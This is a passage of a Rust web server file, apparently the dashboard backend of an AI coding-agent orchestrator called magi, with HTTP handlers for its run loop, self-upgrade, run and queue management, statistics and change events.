1811 parking: bool,
1819 owned: bool,
1827 repo: String,
1830 merge: Option<String>,
1833 last_error: Option<String>,
1841 daemon: DaemonView,
1844}
1845
1846#[derive(Debug, Clone, Copy)]
1855struct Foreign {
1856 pid: Option<u32>,
1858}
1859
1860impl Foreign {
1861 fn of(reading: Option<&daemon::Reading>) -> Option<Self> {
1864 let reading = reading?;
1865 if !reading.running(Timestamp::now()) {
1866 return None;
1867 }
1868 match reading.pid {
1869 Some(pid) if pid == std::process::id() => None,
1870 pid => Some(Self { pid }),
1874 }
1875 }
1876
1877 fn who(&self) -> String {
1880 match self.pid {
1881 Some(pid) => format!("another magi process (pid {pid})"),
1882 None => "another magi process".to_owned(),
1883 }
1884 }
1885}
1886
1887type Launch = fn(daemon::Opts, daemon::Stop) -> Pin<Box<dyn Future<Output = Result<()>> + Send>>;
1892
1893fn launch_daemon(
1895 opts: daemon::Opts,
1896 stop: daemon::Stop,
1897) -> Pin<Box<dyn Future<Output = Result<()>> + Send>> {
1898 Box::pin(daemon::serve_until(opts, stop))
1899}
1900
1901#[derive(Debug, Default)]
1903struct LoopState {
1904 live: Option<Live>,
1906 rev: u64,
1914 last_error: Option<String>,
1917}
1918
1919#[derive(Debug)]
1921struct Live {
1922 stop: daemon::Stop,
1924 handle: tokio::task::JoinHandle<()>,
1929 opts: daemon::Opts,
1933}
1934
1935impl Live {
1936 fn alive(&self) -> bool {
1938 !self.handle.is_finished()
1939 }
1940}
1941
1942fn lock_or_recover(state: &Mutex<LoopState>) -> MutexGuard<'_, LoopState> {
1949 state.lock().unwrap_or_else(PoisonError::into_inner)
1950}
1951
1952async fn loop_get(State(ui): State<Arc<Ui>>) -> ApiResult<Json<LoopView>> {
1954 blocking(move || {
1955 let reading = daemon::read_status(&ui.home);
1956 Ok(Json(ui.loop_view(reading)))
1957 })
1958 .await
1959}
1960
1961#[derive(Debug, Deserialize)]
1967#[serde(deny_unknown_fields)]
1968struct LoopCommand {
1969 running: bool,
1970 #[serde(default)]
1980 park: bool,
1981}
1982
1983async fn loop_post(
1991 State(ui): State<Arc<Ui>>,
1992 body: std::result::Result<Json<LoopCommand>, JsonRejection>,
1993) -> ApiResult<Json<LoopView>> {
1994 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
1997 blocking(move || {
1998 let reading = daemon::read_status(&ui.home);
1999 let foreign = Foreign::of(reading.as_ref());
2000 if body.running {
2001 ui.start_loop(foreign)?;
2002 } else {
2003 ui.stop_loop(foreign, body.park)?;
2004 }
2005 Ok(Json(ui.loop_view(reading)))
2006 })
2007 .await
2008}
2009
2010#[derive(Debug, Serialize)]
2012struct UpgradeView {
2013 from: String,
2015 to: Option<String>,
2017 parked: Option<String>,
2019 detail: String,
2021}
2022
2023async fn upgrade_post(State(ui): State<Arc<Ui>>) -> ApiResult<(StatusCode, Json<UpgradeView>)> {
2047 let reading = daemon::read_status(&ui.home);
2048 if let Some(other) = Foreign::of(reading.as_ref()) {
2049 return Err(ApiError::conflict(format!(
2050 "the loop belongs to {}, so replacing this binary would leave \
2051 that process running an old one against the same queue. Upgrade \
2052 where it was started.",
2053 other.who()
2054 )));
2055 }
2056
2057 if crate::updater::disabled_by_env() {
2063 return Ok((
2064 StatusCode::OK,
2065 Json(UpgradeView {
2066 from: env!("CARGO_PKG_VERSION").to_owned(),
2067 to: None,
2068 parked: None,
2069 detail: format!(
2070 "Automatic updates are disabled by {}. Nothing was parked \
2071 and nothing restarted.",
2072 crate::updater::NO_AUTOUPDATE_ENV
2073 ),
2074 }),
2075 ));
2076 }
2077
2078 let (cfg, _) = Config::discover(&ui.repo, None).unwrap_or_default();
2083 let from = env!("CARGO_PKG_VERSION").to_owned();
2084 let latest = match crate::updater::Checker::new(&cfg.update) {
2085 Some(checker) => checker
2086 .newer_release()
2087 .await
2088 .map_err(|e| ApiError::internal(format!("check for a release: {e:#}")))?,
2089 None => None,
2090 };
2091 let Some(latest) = latest else {
2092 return Ok((
2093 StatusCode::OK,
2094 Json(UpgradeView {
2095 from,
2096 to: None,
2097 parked: None,
2098 detail: "Already on the newest release. Nothing was parked \
2099 and nothing restarted."
2100 .to_owned(),
2101 }),
2102 ));
2103 };
2104
2105 let parked = ui.park_for_upgrade()?;
2108 let detail = match &parked {
2109 Some(run) => format!(
2114 "Run {} is parking at its next step, which can take as long as \
2115 the step it is on - up to an hour for an implement wave. The \
2116 deck replaces itself once it parks, comes back, and the loop \
2117 carries that run on from where it stopped. Nothing is lost if \
2118 you close this.",
2119 crate::run::short_of(run)
2120 ),
2121 None => "The deck replaces itself and comes back. Nothing was in \
2122 flight to park."
2123 .to_owned(),
2124 };
2125
2126 let mut progress = updater::Progress::new(from.clone(), latest.tag_name.clone());
2130 progress.parked_run = parked.clone();
2131 let _ = updater::write_progress(&ui.home, &progress);
2132
2133 let home = ui.home.clone();
2134 tokio::spawn(async move {
2135 if let Err(e) = upgrade_and_restart(home.clone()).await {
2136 tracing::error!("the upgrade did not complete: {e:#}");
2137 if let Some(mut progress) = updater::read_progress(&home) {
2138 progress.fail(format!("{e:#}"));
2139 let _ = updater::write_progress(&home, &progress);
2140 }
2141 }
2142 });
2143
2144 Ok((
2145 StatusCode::ACCEPTED,
2146 Json(UpgradeView {
2147 from,
2148 to: Some(latest.tag_name),
2149 parked,
2150 detail,
2151 }),
2152 ))
2153}
2154
2155async fn upgrade_and_restart(home: PathBuf) -> Result<()> {
2160 crate::updater::run_self_update(true, false, true).await?;
2163 tracing::info!("binary replaced - asking the server to hand over");
2164 if let Some(mut progress) = updater::read_progress(&home) {
2165 progress.advance(updater::Stage::Replaced);
2166 let _ = updater::write_progress(&home, &progress);
2167 }
2168 HANDOVER.notify_one();
2169 Ok(())
2170}
2171
2172#[derive(Debug, Serialize)]
2178struct RunSummary {
2179 id: String,
2180 short: String,
2181 status: String,
2182 done: bool,
2183 instruction: String,
2184 title: String,
2185 repo: String,
2186 repo_name: String,
2187 created_at: String,
2188 updated_at: String,
2189 candidates: usize,
2190 viable: usize,
2191 judges: usize,
2192 winner: Option<char>,
2193 reviews: usize,
2194 quota_losses: usize,
2195 event: Option<String>,
2196 superseded_by: Option<String>,
2201 waiting: bool,
2208 live: crate::run::Liveness,
2212 pr: Option<crate::run::PrRecord>,
2214 unmerged_by_design: bool,
2220}
2221
2222impl RunSummary {
2223 fn of(state: &RunState, waiting: bool, live: crate::run::Liveness) -> Self {
2224 Self {
2225 id: state.id.clone(),
2226 short: state.short().to_owned(),
2227 status: status_word(state.status),
2228 done: state.status.done(),
2229 unmerged_by_design: state.unmerged_by_design(),
2230 instruction: state.instruction.clone(),
2231 title: title_from(&state.instruction, TITLE_MAX),
2232 repo: state.repo.display().to_string(),
2233 repo_name: state
2234 .repo
2235 .file_name()
2236 .map(|n| n.to_string_lossy().into_owned())
2237 .unwrap_or_default(),
2238 created_at: state.created_at.to_string(),
2239 updated_at: state.updated_at.to_string(),
2240 candidates: state.candidates.len(),
2241 viable: state.viable().len(),
2242 judges: state.config.graph.judges,
2243 winner: state.winner().map(|c| c.label),
2244 reviews: state.reviews.len(),
2245 quota_losses: state.quota.len(),
2246 event: state.events.last().map(|e| e.message.clone()),
2247 waiting,
2248 live,
2249 superseded_by: None,
2252 pr: state.pr.clone(),
2253 }
2254 }
2255}
2256
2257fn status_word(status: RunStatus) -> String {
2260 status.as_str().to_owned()
2264}
2265
2266#[derive(Debug, Deserialize)]
2268struct ListQuery {
2269 #[serde(default)]
2270 limit: Option<usize>,
2271}
2272
2273async fn runs_list(
2274 State(ui): State<Arc<Ui>>,
2275 Query(q): Query<ListQuery>,
2276) -> ApiResult<Json<Vec<RunSummary>>> {
2277 let limit = q.limit.unwrap_or(LIST_DEFAULT).min(LIST_MAX);
2278 blocking(move || {
2279 let superseded = ui.queue.superseded();
2280 let open_runs: HashSet<String> = ui
2284 .questions
2285 .list()
2286 .into_iter()
2287 .filter(|q| q.status.open())
2288 .map(|q| q.run)
2289 .collect();
2290 let claimed: HashSet<String> =
2291 crate::daemon::current_work(&ui.home, jiff::Timestamp::now())
2292 .into_iter()
2293 .map(|c| c.run)
2294 .collect();
2295 let states = run_ids(&ui.runs)
2296 .into_iter()
2297 .filter_map(|id| read_run(&ui.runs, &id).ok())
2302 .take(limit);
2303 let probe = std::cell::RefCell::new(crate::proc::ProcProbe::real());
2304 let summaries = summarize(
2305 states,
2306 &open_runs,
2307 &claimed,
2308 &superseded,
2309 |p| probe.borrow_mut().status(p),
2310 |p| probe.borrow_mut().started_at(p),
2311 );
2312 Ok(Json(summaries))
2313 })
2314 .await
2315}
2316
2317fn summarize<I, S, D>(
2323 states: I,
2324 open_runs: &HashSet<String>,
2325 claimed: &HashSet<String>,
2326 superseded: &HashMap<String, String>,
2327 mut status_q: S,
2328 mut identity_q: D,
2329) -> Vec<RunSummary>
2330where
2331 I: IntoIterator<Item = RunState>,
2332 S: FnMut(u32) -> Option<bool>,
2333 D: FnMut(u32) -> Option<String>,
2334{
2335 states
2336 .into_iter()
2337 .map(|state| {
2338 let waiting = open_runs.contains(&state.id);
2339 let live =
2340 state.liveness_with(claimed.contains(&state.id), &mut status_q, &mut identity_q);
2341 let mut row = RunSummary::of(&state, waiting, live);
2342 row.superseded_by = superseded
2343 .get(&state.id)
2344 .map(String::as_str)
2345 .map(crate::run::short_of)
2346 .map(str::to_owned);
2347 row
2348 })
2349 .collect()
2350}
2351
2352#[derive(Debug, Serialize)]
2359struct RunDetailView {
2360 #[serde(flatten)]
2361 state: RunState,
2362 instruction_md: Vec<md::Node>,
2363 live: crate::run::Liveness,
2378 unmerged_by_design: bool,
2383 superseded_by: Option<String>,
2391 latest_attempt: Option<LatestAttempt>,
2405}
2406
2407#[derive(Debug, Serialize)]
2409struct LatestAttempt {
2410 id: String,
2411 short: String,
2412 resolved: bool,
2423}
2424
2425impl RunDetailView {
2426 fn of(
2427 state: RunState,
2428 live: crate::run::Liveness,
2429 superseded_by: Option<String>,
2430 latest_attempt: Option<LatestAttempt>,
2431 ) -> Self {
2432 Self {
2433 instruction_md: md::to_nodes(&state.instruction, &md::ImageBase::None),
2434 live,
2435 unmerged_by_design: state.unmerged_by_design(),
2436 superseded_by,
2437 latest_attempt,
2438 state,
2439 }
2440 }
2441}
2442
2443async fn run_detail(
2444 State(ui): State<Arc<Ui>>,
2445 Path(id): Path<String>,
2446) -> ApiResult<Json<RunDetailView>> {
2447 blocking(move || {
2448 let id = resolve_run(&ui.runs, &id)?;
2449 let state = read_run(&ui.runs, &id)?;
2450 let daemon_claims = crate::daemon::is_working_on(&ui.home, &id, jiff::Timestamp::now());
2451 let live = state.liveness(daemon_claims);
2452 let superseded_by = ui
2453 .queue
2454 .superseded_by(&id)
2455 .as_deref()
2456 .map(crate::run::short_of)
2457 .map(str::to_owned);
2458 let latest_attempt = ui.queue.latest_attempt(&id).and_then(|head_id| {
2462 read_run(&ui.runs, &head_id).ok().map(|head| LatestAttempt {
2463 short: head.short().to_owned(),
2464 resolved: matches!(head.status, RunStatus::Merged | RunStatus::Ready),
2465 id: head.id,
2466 })
2467 });
2468 Ok(Json(RunDetailView::of(
2469 state,
2470 live,
2471 superseded_by,
2472 latest_attempt,
2473 )))
2474 })
2475 .await
2476}
2477
2478async fn run_delete(State(ui): State<Arc<Ui>>, Path(id): Path<String>) -> ApiResult<StatusCode> {
2487 let (id, unreadable) = {
2488 let ui = Arc::clone(&ui);
2489 blocking(move || {
2490 let id = resolve_run(&ui.runs, &id)?;
2491 match read_run(&ui.runs, &id) {
2492 Ok(state) => {
2493 let in_flight =
2494 crate::daemon::is_working_on(&ui.home, &id, jiff::Timestamp::now());
2495 state
2496 .ensure_can_delete(in_flight)
2497 .map_err(|e| ApiError::conflict(format!("{e:#}")))?;
2498 let dir = ui.runs.join(&id);
2499 std::fs::remove_dir_all(&dir)
2500 .with_context(|| format!("remove run directory {}", dir.display()))?;
2501 Ok((id, false))
2502 }
2503 Err(_) => {
2504 if crate::daemon::is_working_on(&ui.home, &id, jiff::Timestamp::now()) {
2508 return Err(ApiError::conflict(format!(
2509 "run {id} is being worked on by a live daemon right now"
2510 )));
2511 }
2512 Ok((id, true))
2513 }
2514 }
2515 })
2516 .await?
2517 };
2518 if unreadable {
2519 crate::clean::fold_unreadable(&ui.runs, &ui.worktrees_root, &id)
2520 .await
2521 .map_err(|e| ApiError::internal(format!("{e:#}")))?;
2522 }
2523 let ui = Arc::clone(&ui);
2524 let done = id.clone();
2525 blocking(move || {
2526 ui.questions.abandon_for_run(
2529 &done,
2530 &format!("run {done} was deleted, so nothing is waiting for this answer"),
2531 )?;
2532 Ok(())
2533 })
2534 .await?;
2535 Ok(StatusCode::NO_CONTENT)
2536}
2537
2538async fn run_fold(State(ui): State<Arc<Ui>>, Path(id): Path<String>) -> ApiResult<Json<FoldView>> {
2562 let (id, state) = {
2563 let ui = Arc::clone(&ui);
2564 blocking(move || {
2565 let id = resolve_run(&ui.runs, &id)?;
2566 if crate::daemon::is_working_on(&ui.home, &id, jiff::Timestamp::now()) {
2567 return Err(ApiError::conflict(format!(
2568 "run {id} is being worked on by a live daemon right now"
2569 )));
2570 }
2571 let state = read_run(&ui.runs, &id).ok();
2572 Ok((id, state))
2573 })
2574 .await?
2575 };
2576 let removed = match state {
2577 Some(mut state) => {
2578 let removed = crate::graph::fold_run(&mut state, true, &ui.home)
2579 .await
2580 .map_err(|e| ApiError::internal(format!("{e:#}")))?;
2581 if removed.is_empty() {
2586 crate::clean::clear_abandoned_active(&mut state, &ui.home, jiff::Timestamp::now())
2587 .map_err(|e| ApiError::internal(format!("{e:#}")))?;
2588 }
2589 removed
2590 }
2591 None => crate::clean::fold_unreadable(&ui.runs, &ui.worktrees_root, &id)
2592 .await
2593 .map_err(|e| ApiError::internal(format!("{e:#}")))?,
2594 };
2595 Ok(Json(FoldView {
2596 run: id,
2597 removed_count: removed.len(),
2598 removed,
2599 }))
2600}
2601
2602#[derive(Debug, Serialize)]
2604struct FoldView {
2605 run: String,
2606 removed: Vec<String>,
2608 removed_count: usize,
2609}
2610
2611#[derive(Debug, Deserialize)]
2614struct FoldMergedBody {
2615 #[serde(default)]
2616 pr_url: String,
2617}
2618
2619async fn run_fold_merged(
2639 State(ui): State<Arc<Ui>>,
2640 Path(id): Path<String>,
2641 Json(body): Json<FoldMergedBody>,
2642) -> ApiResult<Json<FoldMergedView>> {
2643 let pr_url = body.pr_url.trim().to_owned();
2644 if pr_url.is_empty() {
2645 return Err(ApiError::bad_request("pr_url is required"));
2646 }
2647 let (id, mut state) = {
2648 let ui = Arc::clone(&ui);
2649 blocking(move || {
2650 let id = resolve_run(&ui.runs, &id)?;
2651 if crate::daemon::is_working_on(&ui.home, &id, jiff::Timestamp::now()) {
2652 return Err(ApiError::conflict(format!(
2653 "run {id} is being worked on by a live daemon right now"
2654 )));
2655 }
2656 let state = read_run(&ui.runs, &id)?;
2657 Ok((id, state))
2658 })
2659 .await?
2660 };
2661 let (before, after) = crate::land::correct_manual_merge(&mut state, &pr_url)
2662 .await
2663 .map_err(|e| ApiError::bad_request(format!("{e:#}")))?;
2664 let removed = crate::graph::fold_run(&mut state, true, &ui.home)
2665 .await
2666 .map_err(|e| ApiError::internal(format!("{e:#}")))?;
2667 Ok(Json(FoldMergedView {
2668 run: id,
2669 before: before.as_str().to_owned(),
2670 after: after.as_str().to_owned(),
2671 removed,
2672 }))
2673}
2674
2675#[derive(Debug, Serialize)]
2677struct FoldMergedView {
2678 run: String,
2679 before: String,
2681 after: String,
2683 removed: Vec<String>,
2685}
2686
2687async fn run_resume(
2707 State(ui): State<Arc<Ui>>,
2708 Path(id): Path<String>,
2709) -> ApiResult<(StatusCode, Json<RunSummary>)> {
2710 let (id, state) = {
2711 let ui = Arc::clone(&ui);
2712 blocking(move || {
2713 let id = resolve_run(&ui.runs, &id)?;
2714 let state = read_run(&ui.runs, &id)?;
2715 Ok((id, state))
2716 })
2717 .await?
2718 };
2719 if !state.status.resumable() {
2720 return Err(ApiError::conflict(format!(
2721 "run {} is `{}`, and only a stalled or blocked run can be resumed",
2722 state.short(),
2723 status_word(state.status)
2724 )));
2725 }
2726 if let Some(work) = crate::daemon::current_work(&ui.home, jiff::Timestamp::now())
2731 .into_iter()
2732 .next()
2733 {
2734 return Err(ApiError::conflict(format!(
2735 "the loop is running run {} right now; stop it first, or wait for \
2736 it to finish, before resuming a run by hand.",
2737 crate::run::short_of(&work.run)
2738 )));
2739 }
2740 let _resume = ui.begin_resume(&id)?;
2741
2742 let queued = RunSummary::of(
2745 &state,
2746 !ui.questions.open_for(&id).is_empty(),
2747 state.liveness(false),
2748 );
2749 let run = id.clone();
2750 tokio::spawn(async move {
2751 let _resume = _resume;
2752 match crate::graph::Runner::resume(&run) {
2753 Ok(mut runner) => {
2754 if let Err(e) = runner.execute().await {
2755 tracing::warn!("resume of run {run} stopped: {e:#}");
2756 }
2757 }
2758 Err(e) => tracing::warn!("run {run} could not be resumed: {e:#}"),
2761 }
2762 });
2763 Ok((StatusCode::ACCEPTED, Json(queued)))
2764}
2765
2766async fn run_report(
2767 State(ui): State<Arc<Ui>>,
2768 Path(id): Path<String>,
2769) -> ApiResult<impl IntoResponse> {
2770 let text = blocking(move || {
2771 let id = resolve_run(&ui.runs, &id)?;
2772 let state = read_run(&ui.runs, &id)?;
2776 let daemon_claims = crate::daemon::is_working_on(&ui.home, &id, jiff::Timestamp::now());
2777 let live = state.liveness(daemon_claims);
2778 Ok(format!(
2779 "{}{}",
2780 report::run(&state),
2781 report::active_seats(&state, live)
2782 ))
2783 })
2784 .await?;
2785 Ok(([(header::CONTENT_TYPE, "text/plain; charset=utf-8")], text))
2786}
2787
2788#[derive(Debug, Serialize)]
2794struct TaskView {
2795 #[serde(flatten)]
2796 task: Task,
2797 source_label: String,
2798 status_str: &'static str,
2799 instruction_md: Vec<md::Node>,
2803 waits_on: Vec<String>,
2807 stuck_roots: Vec<String>,
2810}
2811
2812impl From<Task> for TaskView {
2813 fn from(task: Task) -> Self {
2814 Self {
2815 source_label: task.source.label(),
2816 status_str: task.status.as_str(),
2817 instruction_md: md::to_nodes(&task.instruction, &md::ImageBase::None),
2818 waits_on: Vec::new(),
2819 stuck_roots: Vec::new(),
2820 task,
2821 }
2822 }
2823}
2824
2825impl TaskView {
2826 fn with_inventory(task: Task, inv: &crate::blockers::Inventory) -> Self {
2827 let waits_on = inv.waits_on(&task);
2828 let stuck_roots = inv
2829 .stuck_roots(&task)
2830 .iter()
2831 .map(|r| r.rsplit('-').next().unwrap_or(r).to_owned())
2832 .collect();
2833 Self {
2834 waits_on,
2835 stuck_roots,
2836 ..Self::from(task)
2837 }
2838 }
2839}
2840
2841#[derive(Debug, Default, Deserialize)]
2844#[serde(default)]
2845struct ReposQuery {
2846 refresh: u8,
2847}
2848
2849async fn repos_list(
2856 State(ui): State<Arc<Ui>>,
2857 Query(q): Query<ReposQuery>,
2858) -> ApiResult<Json<Vec<repos::Repo>>> {
2859 let refresh = q.refresh != 0;
2860 blocking(move || {
2861 let (cfg, _) = Config::discover(&ui.repo, None)?;
2862 Ok(Json(ui.repos_cache.list(
2863 &cfg.repos.roots,
2864 Duration::from_secs(cfg.repos.scan_ttl),
2865 refresh,
2866 )))
2867 })
2868 .await
2869}
2870
2871async fn queue_list(State(ui): State<Arc<Ui>>) -> ApiResult<Json<Vec<TaskView>>> {
2872 blocking(move || {
2873 let tasks = ui.queue.list();
2874 let inv = crate::blockers::Inventory::new(tasks.clone(), &ui.questions.list());
2875 Ok(Json(
2876 tasks
2877 .into_iter()
2878 .map(|t| TaskView::with_inventory(t, &inv))
2879 .collect(),
2880 ))
2881 })
2882 .await
2883}
2884
2885#[derive(Debug, Serialize)]
2889struct RateView {
2890 pct: f64,
2891 denominator: usize,
2892}
2893
2894impl RateView {
2895 fn of(numerator: usize, denominator: usize) -> Option<Self> {
2896 (denominator > 0).then(|| Self {
2897 pct: 100.0 * numerator as f64 / denominator as f64,
2898 denominator,
2899 })
2900 }
2901}
2902
2903#[derive(Debug, Serialize)]
2908struct StatsTotalsView {
2909 runs: usize,
2910 merged: usize,
2911 ready: usize,
2912 blocked: usize,
2913 failed: usize,
2914 stalled: usize,
2915 verified_noop: usize,
2916 superseded: usize,
2917 in_progress: usize,
2918 completion_rate: Option<RateView>,
2919 tallied: usize,
2920 split: usize,
2921 split_rate: Option<RateView>,
2922 deliberated: usize,
2923 minds_changed: usize,
2924 converged: usize,
2925 review_rounds: usize,
2926}
2927
2928impl From<&stats::Totals> for StatsTotalsView {
2929 fn from(t: &stats::Totals) -> Self {
2930 Self {
2931 runs: t.runs,
2932 merged: t.merged,
2933 ready: t.ready,
2934 blocked: t.blocked,
2935 failed: t.failed,
2936 stalled: t.stalled,
2937 verified_noop: t.verified_noop,
2938 superseded: t.superseded,
2939 in_progress: t.in_progress,
2940 completion_rate: RateView::of(t.merged + t.ready, t.runs),
2941 tallied: t.tallied,
2942 split: t.split,
2943 split_rate: RateView::of(t.split, t.tallied),
2944 deliberated: t.deliberated,
2945 minds_changed: t.minds_changed,
2946 converged: t.converged,
2947 review_rounds: t.review_rounds,
2948 }
2949 }
2950}
2951
2952#[derive(Debug, Serialize)]
2954struct AgentStatsView {
2955 agent: String,
2956 entered: usize,
2957 wins: usize,
2958 empty: usize,
2959 win_rate: Option<RateView>,
2960}
2961
2962impl From<&stats::AgentStats> for AgentStatsView {
2963 fn from(a: &stats::AgentStats) -> Self {
2964 Self {
2965 agent: a.agent.clone(),
2966 entered: a.entered,
2967 wins: a.wins,
2968 empty: a.empty,
2969 win_rate: RateView::of(a.wins, a.entered),
2970 }
2971 }
2972}
2973
2974#[derive(Debug, Serialize)]
2978struct ReviewerStatsView {
2979 agent: String,
2980 rounds: usize,
2981 seated: usize,
2982 submitted: usize,
2983 adopted: usize,
2984 unique: usize,
2985 timeouts: usize,
2986 adopted_per_round: Option<f64>,
2987 precision: Option<RateView>,
2988 unique_rate: Option<RateView>,
2989 timeout_rate: Option<RateView>,
2990}
2991
2992impl From<&stats::ReviewerStats> for ReviewerStatsView {
2993 fn from(r: &stats::ReviewerStats) -> Self {
2994 Self {
2995 agent: r.agent.clone(),
2996 rounds: r.rounds,
2997 seated: r.seated,
2998 submitted: r.submitted,
2999 adopted: r.adopted,
3000 unique: r.unique,
3001 timeouts: r.timeouts,
3002 adopted_per_round: (r.rounds > 0).then(|| r.adopted_per_round()),
3003 precision: RateView::of(r.adopted, r.submitted),
3004 unique_rate: RateView::of(r.unique, r.submitted),
3005 timeout_rate: RateView::of(r.timeouts, r.seated),
3006 }
3007 }
3008}
3009
3010#[derive(Debug, Serialize)]
3012struct E2eStatsView {
3013 rounds: usize,
3014 failures: usize,
3015 sole_detections: usize,
3016 deferred: usize,
3017 sole_rate: Option<RateView>,
3018}
3019
3020impl From<&stats::E2eStats> for E2eStatsView {
3021 fn from(e: &stats::E2eStats) -> Self {
3022 Self {
3023 rounds: e.rounds,
3024 failures: e.failures,
3025 sole_detections: e.sole_detections,
3026 deferred: e.deferred,
3027 sole_rate: RateView::of(e.sole_detections, e.failures),
3028 }
3029 }
3030}
3031
3032#[derive(Debug, Serialize)]
3034struct TaskCountsView {
3035 queued: usize,
3036 running: usize,
3037 done: usize,
3038 failed: usize,
3039 held: usize,
3040 blocked: usize,
3041}
3042
3043impl From<crate::queue::TaskCounts> for TaskCountsView {
3044 fn from(c: crate::queue::TaskCounts) -> Self {
3045 Self {
3046 queued: c.queued,
3047 running: c.running,
3048 done: c.done,
3049 failed: c.failed,
3050 held: c.held,
3051 blocked: c.blocked,
3052 }
3053 }
3054}
3055
3056#[derive(Debug, Serialize)]
3062struct StatsView {
3063 totals: StatsTotalsView,
3064 agents: Vec<AgentStatsView>,
3066 reviewers: Vec<ReviewerStatsView>,
3068 e2e: E2eStatsView,
3069 queue: TaskCountsView,
3070 runs_unreadable: usize,
3074}
3075
3076async fn stats_get(State(ui): State<Arc<Ui>>) -> ApiResult<Json<StatsView>> {
3082 blocking(move || {
3083 let states: Vec<RunState> = run_ids(&ui.runs)
3084 .into_iter()
3085 .filter_map(|id| read_run(&ui.runs, &id).ok())
3086 .collect();
3087 let collected = stats::collect(&states);
3088 let queue_counts = crate::queue::TaskCounts::of(&ui.queue.list());
3089 Ok(Json(StatsView {
3090 totals: StatsTotalsView::from(&collected.totals),
3091 agents: collected.agents.iter().map(AgentStatsView::from).collect(),
3092 reviewers: collected
3093 .reviewers
3094 .iter()
3095 .map(ReviewerStatsView::from)
3096 .collect(),
3097 e2e: E2eStatsView::from(&collected.e2e),
3098 queue: TaskCountsView::from(queue_counts),
3099 runs_unreadable: runs_unreadable(&ui.runs),
3100 }))
3101 })
3102 .await
3103}
3104
3105#[derive(Debug, Default, Deserialize)]
3108#[serde(default, deny_unknown_fields)]
3109struct HoldBody {
3110 reason: Option<String>,
3111}
3112
3113async fn queue_hold(
3114 State(ui): State<Arc<Ui>>,
3115 Path(id): Path<String>,
3116 body: std::result::Result<Json<HoldBody>, JsonRejection>,
3117) -> ApiResult<Json<TaskView>> {
3118 let body = match body {
3122 Ok(Json(body)) => body,
3123 Err(JsonRejection::MissingJsonContentType(_)) => HoldBody::default(),
3124 Err(e) => return Err(ApiError::bad_request(e.body_text())),
3125 };
3126 let reason = body.reason.filter(|r| !r.trim().is_empty());
3127 mutate(ui, id, move |t| {
3128 t.hold_manual(reason.clone());
3129 Ok(())
3130 })
3131 .await
3132}
3133
3134async fn queue_release(
3135 State(ui): State<Arc<Ui>>,
3136 Path(id): Path<String>,
3137) -> ApiResult<Json<TaskView>> {
3138 mutate(ui, id, |t| {
3139 t.release();
3140 Ok(())
3141 })
3142 .await
3143}
3144
3145#[derive(Debug, Deserialize)]
3147#[serde(deny_unknown_fields)]
3148struct PriorityBody {
3149 priority: i32,
3150}
3151
3152async fn queue_priority(
3158 State(ui): State<Arc<Ui>>,
3159 Path(id): Path<String>,
3160 body: std::result::Result<Json<PriorityBody>, JsonRejection>,
3161) -> ApiResult<Json<TaskView>> {
3162 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
3163 mutate(ui, id, move |t| t.set_priority(body.priority)).await
3164}
3165
3166#[derive(Debug, Deserialize)]
3168#[serde(deny_unknown_fields)]
3169struct EditBody {
3170 title: String,
3171 instruction: String,
3172}
3173
3174async fn queue_edit(
3178 State(ui): State<Arc<Ui>>,
3179 Path(id): Path<String>,
3180 body: std::result::Result<Json<EditBody>, JsonRejection>,
3181) -> ApiResult<Json<TaskView>> {
3182 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
3183 mutate(ui, id, move |t| {
3184 t.edit(body.title.clone(), body.instruction.clone())
3185 })
3186 .await
3187}
3188
3189async fn queue_done(
3197 State(ui): State<Arc<Ui>>,
3198 Path(id): Path<String>,
3199) -> ApiResult<Json<TaskView>> {
3200 let home = ui.home.clone();
3201 mutate(ui, id, move |t| {
3202 t.succeed();
3203 crate::daemon::supersede_prior_runs(t, &home);
3211 Ok(())
3212 })
3213 .await
3214}
3215
3216async fn queue_delete(State(ui): State<Arc<Ui>>, Path(id): Path<String>) -> ApiResult<StatusCode> {
3224 blocking(move || {
3225 let id = resolve_task(&ui.queue, &id)?;
3226 let in_flight = crate::daemon::is_working_on_task(&ui.home, &id, jiff::Timestamp::now());
3227 ui.queue
3228 .remove(&id, in_flight, &ui.questions)
3229 .map_err(|e| ApiError::conflict(format!("{e:#}")))?;
3230 Ok(StatusCode::NO_CONTENT)
3231 })
3232 .await
3233}
3234
3235async fn mutate(
3244 ui: Arc<Ui>,
3245 id: String,
3246 change: impl FnOnce(&mut Task) -> Result<()> + Send + 'static,
3247) -> ApiResult<Json<TaskView>> {
3248 blocking(move || {
3249 let id = resolve_task(&ui.queue, &id)?;
3250 let _claim = ui.queue.claim(&id).map_err(|e| {
3255 ApiError::conflict(format!(
3256 "{e:#} - a daemon is running this task, so it cannot be \
3257 changed from here yet"
3258 ))
3259 })?;
3260 let mut task = ui.queue.get(&id)?;
3261 change(&mut task).map_err(ApiError::bad_request_from)?;
3262 ui.queue.put(&mut task)?;
3263 Ok(Json(TaskView::from(task)))
3264 })
3265 .await
3266}
3267
3268async fn events(State(ui): State<Arc<Ui>>) -> impl IntoResponse {
3276 let (tx, rx) = tokio::sync::mpsc::channel::<Event>(4);
3277 tokio::spawn(async move {
3278 let mut ticker = tokio::time::interval(POLL);
3279 let mut last: Option<(u64, u64, u64, u64, u64, u64)> = None;
3280 loop {
3281 ticker.tick().await;
3284 let state = Arc::clone(&ui);
3285 let revisions = tokio::task::spawn_blocking(move || {
3286 (
3287 state.queue.revision(),
3288 runs_revision(&state.runs),
3289 state.questions.revision(),
3290 state.talks.revision(),
3291 state.notices.revision(),
3292 state.lock_loop().rev,
3296 )
3297 })
3298 .await;
3299 let Ok(revisions) = revisions else { break };
3300 if last == Some(revisions) {
3301 continue;
3302 }
3303 last = Some(revisions);
3304 let payload = serde_json::json!({
3305 "queue_rev": revisions.0,
3306 "runs_rev": revisions.1,
3307 "questions_rev": revisions.2,
3308 "talks_rev": revisions.3,
3309 "notifications_rev": revisions.4,
3310 "loop_rev": revisions.5,
3311 });
3312 let Ok(event) = Event::default().event("change").json_data(payload) else {
3314 break;
3315 };
3316 if tx.send(event).await.is_err() {
3317 break;
3318 }
3319 }
3320 });
3321 Sse::new(ReceiverStream::new(rx).map(Ok::<Event, Infallible>))
3322 .keep_alive(KeepAlive::new().interval(KEEPALIVE))
3323}
3324
3325fn runs_revision(runs: &FsPath) -> u64 {
3332 use std::hash::{Hash as _, Hasher as _};
3333
3334 let mut entries: Vec<(String, u64)> = std::fs::read_dir(runs)
3335 .into_iter()
3336 .flatten()
3337 .flatten()
